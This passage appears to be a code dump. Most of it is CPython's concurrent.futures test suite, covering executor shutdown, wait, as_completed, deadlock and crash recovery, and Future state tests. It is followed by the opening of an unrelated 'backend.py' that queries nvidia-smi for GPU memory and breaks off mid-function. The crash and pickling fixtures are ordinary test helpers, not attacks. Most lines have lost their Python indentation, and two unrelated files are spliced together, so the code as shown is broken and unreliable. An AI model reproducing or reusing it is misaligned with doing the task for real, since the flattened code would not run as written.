for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
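    # For example, create_executor_tests(InitializerMixin) injects the classes
    # ThreadPoolInitializerTest, ProcessPoolForkInitializerTest,
    # ProcessPoolForkserverInitializerTest and ProcessPoolSpawnInitializerTest
    # into the module globals.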
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertRaises(TypeError):
self.executor.submit(fn=capture, arg=1)
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
    @unittest.skipUnless(sys.platform == 'win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
    def test_resources_gced_in_workers(self):
        # Ensure that the arguments for a job are correctly gc-ed after the
        # job is finished.
mgr = get_context(self.ctx).Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
support.gc_collect()
mgr.shutdown()
mgr.join()
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = support.SHORT_TIMEOUT
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
        # components.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
        # It should be safe to call executor.shutdown() here, as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
        # Extensive testing for deadlocks caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
        # Test that a pool calling shutdown does not cause a deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError,
f1.result, timeout=support.SHORT_TIMEOUT)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = support.threading_setup()
def tearDownModule():
support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
backend.py
|
import psutil
import threading
import subprocess
from subprocess import Popen, PIPE
def gpustats():
try:
out = subprocess.check_output(['nvidia-smi', '--display=MEMORY', '-q']).decode('utf-8').split('\n')[8:]
    except Exception as e:
        raise RuntimeError('nvidia-smi is not available or failed to run.') from e
total = int(out[1].split()[2])
used = int(out[2].split()[2])
return used, total
read_write = (0, 0)
def worker():
global read_write
